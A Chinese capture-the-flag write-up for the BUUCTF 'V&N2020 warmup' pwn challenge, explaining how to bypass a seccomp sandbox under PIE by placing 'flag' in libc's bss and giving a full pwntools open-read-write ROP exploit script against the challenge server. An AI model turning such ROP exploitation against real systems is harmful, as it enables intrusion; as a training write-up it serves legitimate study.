BUUCTF--[V&N2020 公开赛]warmup

一开始直接告诉你libc基址。

有沙盒,分析了一下,write的count不等于0x10就可以,0x30什么的都可以。

嗯,还开了PIE。

很明显了,orw。 问题是开了PIE,b'flag\x00'不能写在BSS上了,同时也不能重复执行main。

怎么办呢,细心的小伙伴会发现我们知道libc的基址,那可以写在libc的bss上面啊。

这是第一段写入,不能溢出。

这是第二段,如果你用gdb调试一下或看看汇编就可以发现,如果这个0x80写满会和上面的0x180连起来。那就很简单了,从libc里面找gadget就好了。

以下是exp:

python 复制代码
from pwn import *
context.arch='amd64'
#io=process('./pwn')
io=remote('node5.buuoj.cn',25603)
libc=ELF('./libc-2.23.so')
io.recvuntil(b'Here is my gift: ')
libc_base=int(io.recv(14),16)-libc.sym['puts']
print('libc_base:',hex(libc_base))
libc.address=libc_base
ope=libc.sym['open']
read=libc.sym['read']
puts=libc.sym['puts']
write=libc.sym['write']
rdi=libc_base+0x21102
rsi=libc_base+0x202e8
rdx=libc_base+0x1b92
push_rsi=libc_base+0x34bcf
bss=libc.bss()
print('bss',hex(bss))
io.recvuntil(b'Input something: ')
payload=p64(0)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x30)
payload+=p64(read)+p64(rdi)+p64(bss)+p64(rsi)+p64(0)+p64(ope)
payload+=p64(rdi)+p64(3)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x30)+p64(read)
payload+=p64(rdi)+p64(1)+p64(rsi)+p64(bss)+p64(rdx)+p64(0x30)+p64(write)
io.send(payload)
io.recvuntil(b"What's your name?")
payload=b'a'*0x78+p64(rdi)
io.send(payload)
sleep(0.1)
io.send(b'flag\x00')
io.interactive()

这里注意一点,open的第二个参数一定要特意写一下。

以下是通义千问的解释:

在不指定rsi的情况,open会直接将rsi里面的值作为flag值,而rsi里面有时候存着地址,是一个极大值,可能会引起一些意想不到的问题。例如这题中,执行rop的时候rsi存着的是buf的地址,是一个极大值,一开始我没有pop rsi为0,导致执行了好几遍都没法orw成功,加上了pop rsi 0才成功读出flag。

相关推荐
程序员哈基耄10 小时前
本地化PDF工具箱:安全、高效的文档处理解决方案
安全·pdf
Coremail111 小时前
AI赋能,安全领航!Coremail受邀出席CERNET第三十一届学术年会
人工智能·安全
网安_秋刀鱼12 小时前
【java安全】shiro反序列化1(shiro550)
java·开发语言·安全·web安全·网络安全·1024程序员节
凌峰的博客12 小时前
基于深度学习的图像安全与隐私保护研究方向调研(上)
安全
是喵斯特ya12 小时前
JNDI注入漏洞分析
java·安全
ZeroNews内网穿透13 小时前
EasyNode 结合 ZeroNews,实现远程管理服务器
运维·服务器·网络协议·安全·http
Black蜡笔小新14 小时前
视频融合平台EasyCVR构筑智慧小区安全防护与智能管理的数字底座
安全·音视频
Hilaku14 小时前
2025快手直播至暗时刻:当黑产自动化洪流击穿P0防线,我们前端能做什么?🤷‍♂️
前端·javascript·安全
思通数据14 小时前
AI智能预警系统:矿山、工厂与油气站安全管理架构浅析
人工智能·深度学习·安全·目标检测·机器学习·计算机视觉·架构
数字护盾(和中)15 小时前
BAS模拟入侵攻击系统:前置防控核心,守护企业网络安全
网络·安全·web安全